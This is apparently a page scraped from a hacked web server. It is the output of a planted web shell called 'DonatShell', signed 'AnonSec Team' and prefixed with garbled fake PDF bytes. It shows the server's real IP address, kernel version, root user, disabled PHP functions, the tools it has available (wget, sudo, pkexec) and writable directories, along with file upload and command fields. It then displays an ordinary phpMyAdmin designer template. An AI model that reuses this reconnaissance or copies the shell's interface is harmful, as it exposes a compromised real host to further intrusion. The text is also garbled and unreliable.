%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 49.231.201.246  /  Your IP : 216.73.216.149
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : root ( 0)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/phpmyadmin/templates/database/designer/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/share/phpmyadmin/templates/database/designer/table_list.phtml
<div id="layer_menu" style="display:none;">
    <div class="center">
        <a href="#" class="M_butt" target="_self" >
            <img title="<?php echo __('Hide/Show all'); ?>"
                 alt="v"
                 id="key_HS_all"
                 src="<?php echo $_SESSION['PMA_Theme']->getImgPath('pmd/downarrow1.png'); ?>"
                 data-down="<?php echo $_SESSION['PMA_Theme']->getImgPath('pmd/downarrow1.png'); ?>"
                 data-right="<?php echo $_SESSION['PMA_Theme']->getImgPath('pmd/rightarrow1.png'); ?>" />
        </a>
        <a href="#" class="M_butt" target="_self" >
            <img alt="v"
                 id="key_HS"
                 title="<?php echo __('Hide/Show Tables with no relation'); ?>"
                 src="<?php echo $_SESSION['PMA_Theme']->getImgPath('pmd/downarrow2.png'); ?>"
                 data-down="<?php echo $_SESSION['PMA_Theme']->getImgPath('pmd/downarrow2.png'); ?>"
                 data-right="<?php echo $_SESSION['PMA_Theme']->getImgPath('pmd/rightarrow2.png'); ?>" />
        </a>
    </div>
    <div id="id_scroll_tab" class="scroll_tab">
        <table width="100%" style="padding-left: 3px;">
            <?php $name_cnt = count($GLOBALS['PMD']['TABLE_NAME']);
            for ($i = 0; $i < $name_cnt; $i++) :
                $checked = (isset($tab_pos[$GLOBALS['PMD']["TABLE_NAME"][$i]])
                    && $tab_pos[$GLOBALS['PMD']["TABLE_NAME"][$i]]["H"])
                    || $display_page == -1; ?>
                <tr>
                    <td title="<?php echo __('Structure'); ?>"
                        width="1px"
                        onmouseover="this.className='L_butt2_2'"
                        onmouseout="this.className='L_butt2_1'"
                        class="L_butt2_1">
                        <img alt=""
                             table_name="<?php echo $GLOBALS['PMD_URL']['TABLE_NAME_SMALL'][$i]; ?>"
                             class="scroll_tab_struct"
                             src="<?php echo $_SESSION['PMA_Theme']->getImgPath('pmd/exec.png'); ?>"/>
                    </td>
                    <td width="1px">
                        <input class="scroll_tab_checkbox"
                               title="<?php echo __('Hide'); ?>"
                               id="check_vis_<?php echo $GLOBALS['PMD_URL']["TABLE_NAME"][$i]; ?>"
                               style="margin:0;"
                               type="checkbox"
                               value="<?php echo $GLOBALS['PMD_URL']["TABLE_NAME"][$i]; ?>"
                               <?php if ($checked) : ?>checked="checked"<?php endif; ?> />
                    </td>
                    <td class="pmd_Tabs"
                        onmouseover="this.className='pmd_Tabs2'"
                        onmouseout="this.className='pmd_Tabs'"
                        pmd_url_table_name="<?php echo $GLOBALS['PMD_URL']['TABLE_NAME'][$i]; ?>">
                        <?php echo $GLOBALS['PMD_OUT']["TABLE_NAME"][$i]; ?>
                    </td>
                </tr>
            <?php endfor; ?>
        </table>
    </div>
    <!-- end id_scroll_tab -->
    <div class="center">
        <?php echo __('Number of tables:'); ?> <?php echo $name_cnt; ?>
    </div>
    <div id="layer_menu_sizer" onmousedown="layer_menu_cur_click=1">
        <div class="floatleft">
            <img class="icon"
                 data-right="<?php echo $_SESSION['PMA_Theme']->getImgPath('pmd/resizeright.png'); ?>"
                 src="<?php echo $_SESSION['PMA_Theme']->getImgPath('pmd/resize.png'); ?>"/>
        </div>
    </div>
</div>
<!-- end layer_menu -->

Anon7 - 2022
AnonSec Team